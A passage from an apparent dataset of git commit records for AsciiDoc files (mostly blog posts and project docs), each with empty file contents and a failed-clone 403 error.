Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-05-14-Targus-Versavu-Keyboard-Case-for-iPad-3-3rd-Gen-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2012-05-14-Targus-Versavu-Keyboard-Case-for-iPad-3-3rd-Gen-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57aa7637b4750b11b72ce85a8de97436018bf4ad","subject":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","message":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb8e1c33b2bb82e922565b43d00de18fc5ad3b00","subject":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1c58108d74cbe303fa05905027b2a602358972b","subject":"Update 2014-06-26-Code-responsibility.adoc","message":"Update 2014-06-26-Code-responsibility.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-06-26-Code-responsibility.adoc","new_file":"_posts\/2014-06-26-Code-responsibility.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ba64fee2110427f5e97b05141b3505ae64815e4","subject":"Update 2015-09-19-Box-Model-Challenge.adoc","message":"Update 2015-09-19-Box-Model-Challenge.adoc","repos":"rh0\/the-myriad-path,rh0\/the-myriad-path,rh0\/the-myriad-path","old_file":"_posts\/2015-09-19-Box-Model-Challenge.adoc","new_file":"_posts\/2015-09-19-Box-Model-Challenge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rh0\/the-myriad-path.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5efdabf0060b2faa0ae6e35f62a3d1070c1f7755","subject":"Regen of Regen","message":"Regen of 
Regen\n","repos":"davidkarlsen\/camel,CodeSmell\/camel,tdiesler\/camel,gnodet\/camel,ullgren\/camel,apache\/camel,alvinkwekel\/camel,DariusX\/camel,CodeSmell\/camel,tdiesler\/camel,adessaigne\/camel,apache\/camel,davidkarlsen\/camel,tadayosi\/camel,apache\/camel,DariusX\/camel,ullgren\/camel,christophd\/camel,cunningt\/camel,pmoerenhout\/camel,alvinkwekel\/camel,mcollovati\/camel,alvinkwekel\/camel,nicolaferraro\/camel,nicolaferraro\/camel,apache\/camel,nikhilvibhav\/camel,cunningt\/camel,tdiesler\/camel,zregvart\/camel,adessaigne\/camel,cunningt\/camel,gnodet\/camel,mcollovati\/camel,CodeSmell\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,christophd\/camel,objectiser\/camel,cunningt\/camel,cunningt\/camel,pax95\/camel,adessaigne\/camel,gnodet\/camel,davidkarlsen\/camel,apache\/camel,Fabryprog\/camel,zregvart\/camel,objectiser\/camel,tadayosi\/camel,nicolaferraro\/camel,pmoerenhout\/camel,gnodet\/camel,tadayosi\/camel,gnodet\/camel,pax95\/camel,christophd\/camel,objectiser\/camel,Fabryprog\/camel,christophd\/camel,tdiesler\/camel,tdiesler\/camel,Fabryprog\/camel,pax95\/camel,pmoerenhout\/camel,DariusX\/camel,objectiser\/camel,pmoerenhout\/camel,pax95\/camel,cunningt\/camel,Fabryprog\/camel,davidkarlsen\/camel,christophd\/camel,adessaigne\/camel,mcollovati\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,ullgren\/camel,apache\/camel,zregvart\/camel,adessaigne\/camel,tadayosi\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tadayosi\/camel,zregvart\/camel,pax95\/camel,CodeSmell\/camel,tdiesler\/camel,ullgren\/camel,nicolaferraro\/camel,pax95\/camel,mcollovati\/camel,adessaigne\/camel,christophd\/camel,DariusX\/camel,tadayosi\/camel","old_file":"components\/readme.adoc","new_file":"components\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fea1a0b80a30c91ecfc83890ed29f59bb03427e4","subject":"Update 2017-03-20-Long-build-time-complicates-doing-proper-code-review-and-what-to-do-with-it.adoc","message":"Update 2017-03-20-Long-build-time-complicates-doing-proper-code-review-and-what-to-do-with-it.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2017-03-20-Long-build-time-complicates-doing-proper-code-review-and-what-to-do-with-it.adoc","new_file":"_posts\/2017-03-20-Long-build-time-complicates-doing-proper-code-review-and-what-to-do-with-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b8a49cb0f5ae1bd21385b132d8c89219245086e","subject":"Update 2015-10-05-Hell-Cell-Number-3.adoc","message":"Update 2015-10-05-Hell-Cell-Number-3.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-05-Hell-Cell-Number-3.adoc","new_file":"_posts\/2015-10-05-Hell-Cell-Number-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4cb1353255d05e2b0c0540a770225ae11223b17","subject":"Update 2016-04-08-Un-poco-de-Harding.adoc","message":"Update 
2016-04-08-Un-poco-de-Harding.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68f50fa5657d4645445b93208ef95202f59decec","subject":"Update 2017-05-31-Naming-Conventions.adoc","message":"Update 2017-05-31-Naming-Conventions.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2124eea7dbe57145566fc4f7b775198177469785","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c487277d75b25f73893283cde0b40adfbafd4765","subject":"y2b create post World's Smallest Video Drone!","message":"y2b create post World's Smallest Video Drone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-27-Worlds-Smallest-Video-Drone.adoc","new_file":"_posts\/2017-03-27-Worlds-Smallest-Video-Drone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d96907bca3e1fafaf2249a4845e6ad9e5977f675","subject":"Update 2017-07-11-the-students-outpost-about3.adoc","message":"Update 2017-07-11-the-students-outpost-about3.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2017-07-11-the-students-outpost-about3.adoc","new_file":"_posts\/2017-07-11-the-students-outpost-about3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e383eb77c7a04cf73ceed8a2d653253483cc4fd","subject":"Update 2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","message":"Update 
2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","repos":"ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io","old_file":"_posts\/2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","new_file":"_posts\/2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ashelle\/ashelle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50c8df96012baf9d1ad7843f3bb93db69b157290","subject":"Update 2016-06-11-Como-usar-este-editor.adoc","message":"Update 2016-06-11-Como-usar-este-editor.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Como-usar-este-editor.adoc","new_file":"_posts\/2016-06-11-Como-usar-este-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15eff837d4ddcd7dc09e92acfb77cdc296435ae4","subject":"Update 2016-08-22-Waging-War-on-Windows.adoc","message":"Update 2016-08-22-Waging-War-on-Windows.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-08-22-Waging-War-on-Windows.adoc","new_file":"_posts\/2016-08-22-Waging-War-on-Windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bretonio\/bretonio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fd9848ba8477313b3e1da6bded1158485074158","subject":"Update 2017-07-07-Payment-Request-A-P-I.adoc","message":"Update 2017-07-07-Payment-Request-A-P-I.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-07-07-Payment-Request-A-P-I.adoc","new_file":"_posts\/2017-07-07-Payment-Request-A-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d34533e70924dc9d5817b30d6b715c354273bb2","subject":"Update 2015-10-12-Four-Acts-of-Citizenry.adoc","message":"Update 2015-10-12-Four-Acts-of-Citizenry.adoc","repos":"mazongo\/mazongo.github.io,mazongo\/mazongo.github.io,mazongo\/mazongo.github.io","old_file":"_posts\/2015-10-12-Four-Acts-of-Citizenry.adoc","new_file":"_posts\/2015-10-12-Four-Acts-of-Citizenry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mazongo\/mazongo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da6e187b21f3a8475f47b5a1ac7225859f7e8ac2","subject":"Update 2016-06-16-Some-thoughts-on-L-S-H.adoc","message":"Update 
2016-06-16-Some-thoughts-on-L-S-H.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-06-16-Some-thoughts-on-L-S-H.adoc","new_file":"_posts\/2016-06-16-Some-thoughts-on-L-S-H.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a4f38675335d2a50026fabffc33768c730fdcb7","subject":"Update 2016-07-16-Test-My-New-Shiny-Blog.adoc","message":"Update 2016-07-16-Test-My-New-Shiny-Blog.adoc","repos":"MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io","old_file":"_posts\/2016-07-16-Test-My-New-Shiny-Blog.adoc","new_file":"_posts\/2016-07-16-Test-My-New-Shiny-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MatanRubin\/MatanRubin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecf1ebc6959a1ed9937f93ea482a54e3cd8e9765","subject":"add news item","message":"add news item\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/01\/26\/clojure1-10-2.adoc","new_file":"content\/news\/2021\/01\/26\/clojure1-10-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"316f680b0aef5e6aabc74ba00eb7bc935e4f22ea","subject":"Renamed '_posts\/2017-10-07-Privacy-Policy-for-coders-Dilemma.adoc' to '_posts\/2014-01-01-Privacy-Policy-for-coders-Dilemma.adoc'","message":"Renamed '_posts\/2017-10-07-Privacy-Policy-for-coders-Dilemma.adoc' to '_posts\/2014-01-01-Privacy-Policy-for-coders-Dilemma.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2014-01-01-Privacy-Policy-for-coders-Dilemma.adoc","new_file":"_posts\/2014-01-01-Privacy-Policy-for-coders-Dilemma.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65435ab611ba6aa200879b5b5c70a0a388c58422","subject":"Update 2015-06-15-collectionview-layout-by-tutorial.adoc","message":"Update 2015-06-15-collectionview-layout-by-tutorial.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-06-15-collectionview-layout-by-tutorial.adoc","new_file":"_posts\/2015-06-15-collectionview-layout-by-tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae4ab05a6215fd0a859adde40dac6afa8bf0f950","subject":"doc: napatech release notes update","message":"doc: napatech release notes update\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/dimagol\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7b3290798b62390a7200fa57615c0ef9287d58d3","subject":"Update 2017-07-20-Thursday-July-20-2017.adoc","message":"Update 2017-07-20-Thursday-July-20-2017.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-20-Thursday-July-20-2017.adoc","new_file":"_posts\/2017-07-20-Thursday-July-20-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"487be07fd4709f4fc4a852704e170d53602df91a","subject":"Update 2019-01-31-Change-Remote-URL-Git.adoc","message":"Update 2019-01-31-Change-Remote-URL-Git.adoc","repos":"alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io","old_file":"_posts\/2019-01-31-Change-Remote-URL-Git.adoc","new_file":"_posts\/2019-01-31-Change-Remote-URL-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alimasyhur\/alimasyhur.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"169fcb1db01757bc225edafed969f6b43d5a582a","subject":"y2b create post Sony AX100 4K Camcorder Hands-On! (CES 2014)","message":"y2b create post Sony AX100 4K Camcorder Hands-On! (CES 2014)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-08-Sony-AX100-4K-Camcorder-HandsOn-CES-2014.adoc","new_file":"_posts\/2014-01-08-Sony-AX100-4K-Camcorder-HandsOn-CES-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"170ddb052b8dee1538ea503b5f2ad7cb85636952","subject":"Update 2015-09-22-worst_point_of_india.adoc","message":"Update 2015-09-22-worst_point_of_india.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-22-worst_point_of_india.adoc","new_file":"_posts\/2015-09-22-worst_point_of_india.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8ceb7679a5ed54530d0772ca723c4edf732e79b","subject":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","message":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3fd37c6f0c0c01ab7561af8680b422b29aa73f4","subject":"Update 
2017-01-19-Swift-Web-View.adoc","message":"Update 2017-01-19-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a45a202d9903ac8fdd541805fae577dc3a13532f","subject":"Update 2017-01-19-Swift-Web-View.adoc","message":"Update 2017-01-19-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ae6137f79fdcbc450f1d6bc8b71d0600c6175ad","subject":"Added opcodes.asciidoc","message":"Added opcodes.asciidoc\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"Doc\/opcodes.asciidoc","new_file":"Doc\/opcodes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab2c2d18d11bf0ebbead2f43efeeb03b9b7d3672","subject":"Added IoCs for Kimsuky's HotDoge case","message":"Added IoCs for Kimsuky's HotDoge case\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"kimsuky\/hotdoge_donutcat_case\/README.adoc","new_file":"kimsuky\/hotdoge_donutcat_case\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"558b6009fcda90cd0e7fe3c421c5ae3e2338209b","subject":"Adding initial recommendations on associations","message":"Adding initial recommendations on associations\n","repos":"ldebello\/javacuriosities,ldebello\/java-advanced,ldebello\/javacuriosities,ldebello\/javacuriosities","old_file":"Hibernate\/HibernateAssociations\/README.adoc","new_file":"Hibernate\/HibernateAssociations\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ldebello\/javacuriosities.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf754daf9d435f7507483c81475e4cabbeca36ad","subject":"Add document header","message":"Add document header\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"1a5bbbbfb9c6145f9c4853ce35cc3816a2c4d652","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 
2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5c716079c4afaed91f41f57a28a064345e985a1","subject":"Create 2015-03-19-forge-2.15.2.final.asciidoc","message":"Create 2015-03-19-forge-2.15.2.final.asciidoc","repos":"luiz158\/docs,addonis1990\/docs,forge\/docs,agoncal\/docs,luiz158\/docs,agoncal\/docs,forge\/docs,addonis1990\/docs","old_file":"news\/ 2015-03-19-forge-2.15.2.final.asciidoc","new_file":"news\/ 2015-03-19-forge-2.15.2.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f2e5033d0c28498c2da4914cd7d03f4214ba3e5f","subject":"Added Boxfuse + AWS deployment information","message":"Added Boxfuse + AWS deployment information","repos":"axelfontaine\/spring-boot,axelfontaine\/spring-boot,axelfontaine\/spring-boot,axelfontaine\/spring-boot,axelfontaine\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/deployment.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/deployment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/axelfontaine\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1a2373921102b1dd7d2379e9057df45747ae79f0","subject":"Update store.asciidoc (#21353)","message":"Update store.asciidoc (#21353)\n\n* Update store.asciidoc\r\n\r\n* Update store.asciidoc\r\n\r\n* Update 
store.asciidoc\r\n","repos":"nilabhsagar\/elasticsearch,njlawton\/elasticsearch,JackyMai\/elasticsearch,fforbeck\/elasticsearch,s1monw\/elasticsearch,mortonsykes\/elasticsearch,umeshdangat\/elasticsearch,ZTE-PaaS\/elasticsearch,sneivandt\/elasticsearch,markwalkom\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,rlugojr\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,obourgain\/elasticsearch,obourgain\/elasticsearch,bawse\/elasticsearch,gfyoung\/elasticsearch,glefloch\/elasticsearch,LeoYao\/elasticsearch,brandonkearby\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,fernandozhu\/elasticsearch,scottsom\/elasticsearch,glefloch\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,StefanGor\/elasticsearch,yanjunh\/elasticsearch,rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,mohit\/elasticsearch,shreejay\/elasticsearch,wangtuo\/elasticsearch,jimczi\/elasticsearch,JackyMai\/elasticsearch,Helen-Zhao\/elasticsearch,i-am-Nathan\/elasticsearch,bawse\/elasticsearch,uschindler\/elasticsearch,sneivandt\/elasticsearch,nazarewk\/elasticsearch,jprante\/elasticsearch,jimczi\/elasticsearch,mohit\/elasticsearch,C-Bish\/elasticsearch,mjason3\/elasticsearch,umeshdangat\/elasticsearch,Stacey-Gammon\/elasticsearch,njlawton\/elasticsearch,wuranbo\/elasticsearch,gingerwizard\/elasticsearch,umeshdangat\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,fforbeck\/elasticsearch,winstonewert\/elasticsearch,elasticdog\/elasticsearch,JervyShi\/elasticsearch,StefanGor\/elasticsearch,wangtuo\/elasticsearch,rajanm\/elasticsearch,MaineC\/elasticsearch,vroyer\/elasticassandra,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,GlenRSmith\/elasticsearch,mohit\/elasticsearch,fforbeck\/elasticsearch,elasticdog\/elasticsearch,markwalkom\/elasticsearch,artnowo\/elasticsearch,gingerwizard\/elasticsearch,wuranbo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,naveenhooda2000\/elasticsearch,JackyMai\/elasticsearch,gingerwizard\/elasticsearch,Shepard1212\/elasticsearch,maddin2016\/elasticsearch,nazarewk\/elasticsearch,nilabhsagar\/elasticsearch,wangtuo\/elasticsearch,umeshdangat\/elasticsearch,MisterAndersen\/elasticsearch,vroyer\/elassandra,sneivandt\/elasticsearch,wangtuo\/elasticsearch,Helen-Zhao\/elasticsearch,brandonkearby\/elasticsearch,fernandozhu\/elasticsearch,Stacey-Gammon\/elasticsearch,winstonewert\/elasticsearch,LeoYao\/elasticsearch,artnowo\/elasticsearch,brandonkearby\/elasticsearch,artnowo\/elasticsearch,henakamaMSFT\/elasticsearch,Helen-Zhao\/elasticsearch,elasticdo